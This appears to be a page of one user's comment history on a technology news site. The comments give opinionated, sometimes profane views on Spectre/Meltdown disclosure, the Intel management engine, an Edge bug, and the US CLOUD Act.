compilers might also need updating to help minimize the number of RAM pages that a "tight little loop" would need in order to function efficiently with out-of-order and speculative execution.

and that 'ret-poline' mitigation COULD become an option, for people who want to do that.

thinking of that last part, I've used 'ret-poline' techniques before. It's the easiest way to jump to a 'long' address on an ATXMega processor (and probably an ATMega also, specifically the ones with >64k of NVRAM). The alternative actually takes more assembly instructions. So you push 3 bytes and do a 'ret' instead. Yeah, Arduinos and microcontrollers. But not a new idea for a "ret-poline".

bombastic bob Silver badge
Black Helicopters

Re: Specter / Meltdown were not mistakes...

"I don't think they'd bother when they've got the management engine"

ack

Seriously, though, there should be a jumper for enabling or disabling the 'management engine' or its equivalent - ONLY allow it when the jumper is set to allow it, so it can be disabled electrically. even a BIOS setting to disable it could theoretically be circumvented.

home users don't need this. Only large organizations that have an IT department with tools that can leverage 'management engine' MIGHT actually need it. But the NSA _can_ use it. That's the problem.

And I doubt Meltdown/Spectre would be something the NSA would want anyway. side channel attacks are too inefficient.

bombastic bob Silver badge
Devil

Re: Nobody has yet

"Explained the benefit of revealing the fault as soon as it was discovered."

Here's the alternate universe timeline that I think should have happened:

1. Intel and AMD announce that they have discovered some flaws in their CPU design that could lead to "side channel" attacks, something that is difficult to anticipate, and NOT disclose the details.

2. Intel and AMD work out fixes for this problem, and share 'mitigations' with all operating system vendors.

3. Intel and AMD release new CPUs that are designed NOT to have these flaws, and provide well tested working microcode for older systems.

4. After all of the fixes are in place, the details are released so people understand what happened.

This would result in Intel and AMD looking VERY good. Initially they get a small hit, but being THAT HONEST about the cock-up will eventually turn around to help them. And NOT disclosing the details helps prevent 0-days from emerging.

The thing about Meltdown and Spectre is that it's not intuitively obvious since they're side-channel attacks [for the most part]. So exploiting them without a really good explanation of what the flaw is would be "hard to guess", a sort of 'security by obscurity' that can last long enough to patch it.

So if Intel and AMD had simply bitten the bullet and admitted the existence of the flaw the moment it was discovered, they MIGHT have INCREASED THEIR SALES overall as a direct result, as people replace old hardware [which was previously considered 'good enough'] to avoid any slowdowns or potential un-patched vulnerabilities.

In any case, this "alternate universe" scenario didn't happen. That made the original cock-up WORSE.

bombastic bob Silver badge
Unhappy

Re: Note that they didn't bother with open source operating systems

Well, according to the article, the 'insiders' comprised "Google, AMD, Arm, Apple, Amazon and Microsoft."

Apple has at least SOME connection with FreeBSD, but there's no motive to let any of the BSD engineers know about something in the KERNEL.

And, there MAY be a 'profit motive' in which "ONLY THEY" have fixes available, so if you don't want a vulnerable system, you "go to them" [specifically Micro-shaft and Apple].

Had IBM been involved, I think we'd have seen more efforts in Linux, and being open source, it would 'trickle' into the BSD's pretty quickly.

The better path is to be as open about this problem as possible. "We F'd up" is a better path than scrambling for the hills and covering your tracks.

Google reveals Edge bug that Microsoft has had trouble fixing

bombastic bob Silver badge
Unhappy

Re: One should note, that it was Microsoft who wrote this bug

"How much did you pay for your copy of Edge? How much did you pay MS to patch it?"

indirect payment: you have to run Win-10-nic to be able to run Edge.

You have to endure the slurp, tracking, and ads jammed up your ass and down your throat, "the Metro" [because We know better how You need to use your computer], and FORCED UPDATES [even if they brick, it's better than NOT accepting the "new, shiny", getting your custom settings reset periodically, and wasting INFINITE BANDWIDTH and YOUR time waiting for infinite updates to load, install, and potentially BRICK *your* computer]. THAT is "payment" (more than) *ENOUGH*.

US state legal supremos show lots of love for proposed CLOUD Act (a law to snoop on citizens' info stored abroad)

bombastic bob Silver badge
Black Helicopters

Re: Don't give in to the unethical and immoral imperial power, the United States

I think you should've used the 'black helicopter' icon.

I have a suggestion: do not store anything in the cloud, and make sure you are well aware that anything that ends up on "teh intarwebs" can be snooped, snarfed, collected, "meta-data'd", and potentially submitted as evidence, regardless of where in the world it's stored, and hopefully NOT by criminals [though it's more likely to be the case].

icon, because, should've been there already.

bombastic bob Silver badge
Meh

Re: America Fuck Yeah

"what will do then US Govt?"

hopefully, REAL police work. Not lazy 'metadata' searches, but the kind that can take a while and usually involves irrefutable evidence collected legally without violating the rights of U.S. citizens [or any international agreements with respect to non-citizens]. THAT is the way it is SUPPOSED to be done.

but yeah, it sounds like the cops are lazy, doesn't it?

"You're a failed state America, face it"

No, not until the point where "they" get their way while the sheeple watch (or fail to watch) without interest. That's really not happening, at least not yet. [what concerns ME is when 'due process' is perverted for the same kinds of reasons, and it seems THAT HAPPENED somewhat recently, from top levels of the FBI, via the FISA court].

bombastic bob Silver badge
Happy

Re: Wow.... just... wow!

"How do you say 'Fuck Off' in American?"

You just did. heh.

bombastic bob Silver badge
Devil

Re: Wow.... just... wow!

"How long would a person spend in jail before law enforcement was satisfied you are correct"

There are limits on how long you can be held for contempt of court (though it may not be apparent). if you are held without bail (and that requires a hearing before a judge to have that happen) then you can be held until you get a not guilty verdict. but that's not likely with a contempt hearing first.

The length of time for being held for contempt would vary based on the jurisdiction. However, it's theoretically possible it could be "forever" if you keep being in contempt.

An example:

https://www.wsj.com/articles/SB123137263059962659

The jail stops the moment you submit to the court's authority. It would take some pretty large gonads to stay in jail for YEARS like that, based entirely on principle.

It's what can happen in a society that's ruled by law. I guess you could ask a similar question in the UK, how long will it take before Julian Assange can 'walk free' in the streets of London? Exactly.

Biting the hand that feeds IT © 1998–2019